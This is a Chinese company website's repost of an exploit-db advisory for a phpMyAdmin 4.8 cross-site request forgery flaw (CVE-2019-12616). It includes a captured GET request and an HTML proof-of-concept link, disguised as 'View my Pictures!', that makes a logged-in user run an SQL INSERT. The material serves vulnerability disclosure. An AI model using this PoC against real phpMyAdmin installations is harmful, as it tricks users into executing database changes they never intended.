网站建设、公众号开发、微网站、微商城、小程序就找牛创网络 !

7*24小时服务专线: 152-150-65-006 023-68263070 扫描二维码加我微信 在线QQ

漏洞公告团结互助,让我们共同进步!

当前位置:主页 > 技术资讯 > 网络安全 > 漏洞公告 >

我们的优势: 10年相关行业经验,专业设计师量身定制 设计师一对一服务模式,上百家客户案例! 企业保证,正规流程,正规合作 7*24小时在线服务,售后无忧

phpMyAdmin 4.8 - Cross-Site Request Forgery安全漏洞公告

文章来源:exploit-db. 发布时间:2019-06-17 10:38:44 围观次数:
分享到:

摘要:攻击者可以很容易地创建一个包含希望代表用户执行的请求的伪超链接,这样就可能由于错误使用HTTP方法而导致CSRF攻击

#漏洞标题:跨站请求伪造(CSRF)

#日期:2019年6月11日

#利用作者:黎曼

#供应商主页:https://www.phpmyadmin.net/

#软件链接:https://www.phpmyadmin.net/downloads/

版本号:4.8

#测试:UBUNTU 16.04 LTS -已安装的Docker镜像- Docker pull phpmyadmin/phpmyadmin:4.8

CVE: 2019-12616


#描述

# 4.9.0之前在phpMyAdmin中发现了一个问题。发现了一个漏洞,允许攻击者对phpMyAdmin用户触发CSRF攻击。攻击者可以欺骗用户,例如,通过一个指向受害者的phpMyAdmin数据库的破碎的<img>标记,攻击者可以潜在地向受害者交付一个有效负载(例如一个特定的INSERT或DELETE语句)。



#VULNERABILITY:

The following request which is a form submission is done using the ¨GET¨ request instead of using ¨POST

<form method="get" action="index.php">
GET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133
Upgrade-Insecure-Requests: 1
Host: localhost:9000


攻击者可以很容易地创建一个包含希望代表用户执行的请求的伪超链接,这样就可能由于错误使用HTTP方法而导致CSRF攻击


#POC

<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  <title>POC CVE-2019-12616</title>
</head>
<body>
<a href="http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark">View my Pictures!</a>
</body>
</html>


本文由 exploit-db. 整理发布,转载请保留出处,内容部分来自于互联网,如有侵权请联系我们删除。

相关热词搜索:phpMyAdmin Cross-Site 安全漏洞 重庆网络安全

上一篇:【CVE-2019-11374】骑士CMS后台CSRF漏洞验证
下一篇:雷鸟 ESR < 60.7.XXX 'icalrecur_add_bydayrules' 缓冲区溢出漏洞

热门资讯

鼠标向下滚动